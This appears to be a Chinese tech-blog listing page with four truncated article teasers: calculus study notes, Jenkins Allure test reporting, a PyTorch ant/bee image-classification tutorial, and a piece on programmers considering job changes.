①不单调的函数也可能有反函数 ②注意反函数与函数转换时的定义域与值域 ③收敛数列不一定有最值 收敛数列必有上界和下界&#xff0c;但不一定有最值&#xff0c;比如{An}1/n&#xff0c;下界为0&#xff0c;但永远取不到0 ④数列与其子数列的关系 例题&#xff1a; ⑤带根号…

使用jenkins插件Allure生成自动化测试报告

前言 以前做自动化测试的时候一直用的HTMLTestRunner来生成测试报告&#xff0c;后来也尝试过用Python的PyH模块自己构建测试报告&#xff0c;在后来看到了RobotFramework的测试报告&#xff0c;感觉之前用的测试报告都太简陋&#xff0c;它才是测试报告应该有的样子。也就是在…

Pytorch进阶教学——训练一个图像分类模型(GPU)

目录 1、前言 2、数据集介绍 3、获取数据 4、创建网络 5、训练模型 6、测试模型 6.1、测试整个模型准确率 6.2、测试单张图片 1、前言 编写一个可以分类蚂蚁和蜜蜂图片的模型&#xff0c;使用数据集对卷积神经网络进行训练。训练后的模型可以对蚂蚁或蜜蜂的图片进行…

全球79%的程序员都在考虑跳槽,你呢?

​在最近二十年中&#xff0c;全球行业都经历了一次数字化变革&#xff0c;各行各业对于技术开发的比重越来越高&#xff0c;而作为技术开发核心的开发人员们对于一个企业的未来发展也变得越来越重要。因此各企业对于技术人才的竞争变得火热&#xff0c;并且这个热度一年高过一…